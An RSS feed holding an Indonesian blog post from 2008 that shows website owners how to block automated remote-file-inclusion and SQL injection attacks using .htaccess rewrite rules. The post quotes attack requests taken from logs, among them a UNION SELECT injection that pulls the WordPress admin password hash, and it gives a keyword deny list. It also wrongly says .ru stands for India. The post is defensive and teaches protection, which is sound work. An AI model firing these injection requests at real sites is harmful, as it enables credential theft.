<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SuccessKid.com ;-) &#187; cracker</title>
	<atom:link href="http://www.successkid.com/Earthquake/cracker/feed" rel="self" type="application/rss+xml" />
	<link>http://www.successkid.com</link>
	<description>The Right Place for Software - Ebook - Blog</description>
	<lastBuildDate>Mon, 19 Jul 2010 05:35:24 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Tips Menangkal Zombie Attack (md5(&#8220;just_a_test&#8221;))</title>
		<link>http://www.successkid.com/tips-menangkal-zombie-attack</link>
		<comments>http://www.successkid.com/tips-menangkal-zombie-attack#comments</comments>
		<pubDate>Thu, 07 Aug 2008 04:53:34 +0000</pubDate>
		<dc:creator>harris</dc:creator>
				<category><![CDATA[Informasi Teknologi]]></category>
		<category><![CDATA[Tips Trik]]></category>
		<category><![CDATA[cracker]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.successkid.com/?p=58</guid>
		<description><![CDATA[Bagi anda yang memiliki website ataupun blog saat ini cukup marak serangan Zombie Attack yang dilakukan oleh black hacker kepada situs-situs yang dicurigai rentan terhadap serangan http dan SQL injection attack. Serangan ini dilakukan secara kontinu oleh komputer zombie yang telah di set oleh black hacker. Jika dilihat di log server anda, maka biasanya akan [...]]]></description>
			<content:encoded><![CDATA[<p><img class="size-medium wp-image-73" style="margin: 5px; float: left;" title="zombie attack" src="http://www.successkid.com/wp-content/uploads/2008/08/zombie-300x281.gif" alt="zombie attack" width="200" height="163" />Bagi anda yang memiliki website ataupun blog saat ini cukup marak serangan Zombie Attack yang dilakukan oleh black hacker kepada situs-situs yang dicurigai rentan terhadap serangan http dan SQL injection attack. Serangan ini dilakukan secara kontinu oleh komputer zombie yang telah di set oleh black hacker. Jika dilihat di log server anda, maka biasanya akan ditemukan URL seperti berikut ini :<span id="more-58"></span></p>
<p><span style="font-size: x-small;">GET/page.php?x=http%3A%2F%2Fwww.vlopezalvarez.com%2FPersonal%2FFotos%2FViajes%2Fxaj%2Fupahebu%2</span></p>
<p>URL diatas akan merujuk pada http://www.vlopezalvarez.com/Personal/Fotos/Viajes/xaj/upahebu/ dimana isi dari halaman tersebut adalah :</p>
<p><strong>&lt;?php echo md5(&#8220;just_a_test&#8221;);?&gt;</strong></p>
<p><strong></strong></p>
<p>URL diatas adalah salah satu saja. Masih banyak lagi serangan yang dilakukan dari URL lainnya. Paling banyak biasanya dari domain yang berekstensi .ru (india). Jadi silahkan cek log anda untuk memastikan ada tidaknya serangan itu. Serangan diatas adalah permulaan saja, jika berhasil maka nantinya akan di inject script jahat ke server anda untuk kemudian website anda &#8220;diperkosa&#8221;. Nah&#8230;  &#8220;Bagusnya&#8221; lagi adalah serangan tersebut dilakukan dari IP address yang berbeda-beda. Sehingga jika anda memutuskan melakukan BLOK IP address tampaknya tidak akan menghentikan serangan tersebut.</p>
<p>Dan serangan yang dilakukan pun tidak hanya berupa http injection saja tapi juga SQL injection yang akan mengeksploitasi database anda termasuk pada aplikasi blog wordpress. Contoh bentuk serangan kepada script wordpress  :</p>
<p><em>GET /stuff/index.php?cat=999 UNION SELECT null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null FROM wp_users where id=1</em></p>
<p>Serangan SQL diatas berupaya mendapatkan password hash admin wordpress anda yang kemudian dicocokan dengan metode <a href="http://en.wikipedia.org/wiki/Rainbow_table" target="_blank">rainbow table</a>. Jika passwordnya mudah maka bisa jebol dengan cepat.</p>
<p><strong>SOLUSI</strong></p>
<p>Solusi yang bisa anda lakukan adalah dengan memblok semua akses http dan SQL injection melalui file .htaccess. Jadi sebaiknya anda segera masukan kode dibawah ini tanpa harus menunggu diserang terlebih dahulu. Isilah file .htaccess anda yang terletak di root direktori dengan script sebagai berikut :</p>
<blockquote><p>RewriteEngine On<br />
 RewriteBase /  <br />
 RewriteCond %{QUERY_STRING} union [NC]  <br />
 RewriteRule .* /————http———– [F,NC]  <br />
 RewriteRule http: /———http———– [F,NC]  <br />
 RewriteCond %{QUERY_STRING} select [NC]  <br />
 RewriteRule .* /————http———– [F,NC]  <br />
 RewriteRule http: /———http———– [F,NC]  <br />
 RewriteCond %{QUERY_STRING} jatest [NC]  <br />
 RewriteRule .* /————http———– [F,NC] <br />
 RewriteRule http: /———http———– [F,NC]  <br />
 RewriteCond %{QUERY_STRING} http [NC]  <br />
 RewriteRule .* /————http———– [F,NC]  <br />
 RewriteRule http: /———http———– [F,NC] <br />
 RewriteCond %{QUERY_STRING} outfile [NC]  <br />
 RewriteRule .* /————http———– [F,NC] <br />
 RewriteRule http: /———http———– [F,NC]</p>
</blockquote>
<p>Script .htaccess diatas diperuntukan untuk website yang rentan terhadap http dan SQL injection. Tapi khusus untuk pengguna wordpress securitynya cukup baik untuk menangkal http attack. Namun untuk SQL attack masih perlu ditambah script diatas dengan <strong>menghapus</strong> baris berikut agar tidak mengganggu  halaman administrasi wordpress :</p>
<p>RewriteCond %{QUERY_STRING} http [NC]<br />
 RewriteRule .* /————http———– [F,NC]<br />
 RewriteRule http: /———http———– [F,NC]</p>
<p>Semoga berguna!</p>
<h4>Incoming search terms for the article:</h4><ul><li><a href="http://www.successkid.com/tips-menangkal-zombie-attack" title="foto zombie">foto zombie</a></li></ul><!-- SEO SearchTerms Tagging 2 plugin took 0.152 ms -->]]></content:encoded>
			<wfw:commentRss>http://www.successkid.com/tips-menangkal-zombie-attack/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
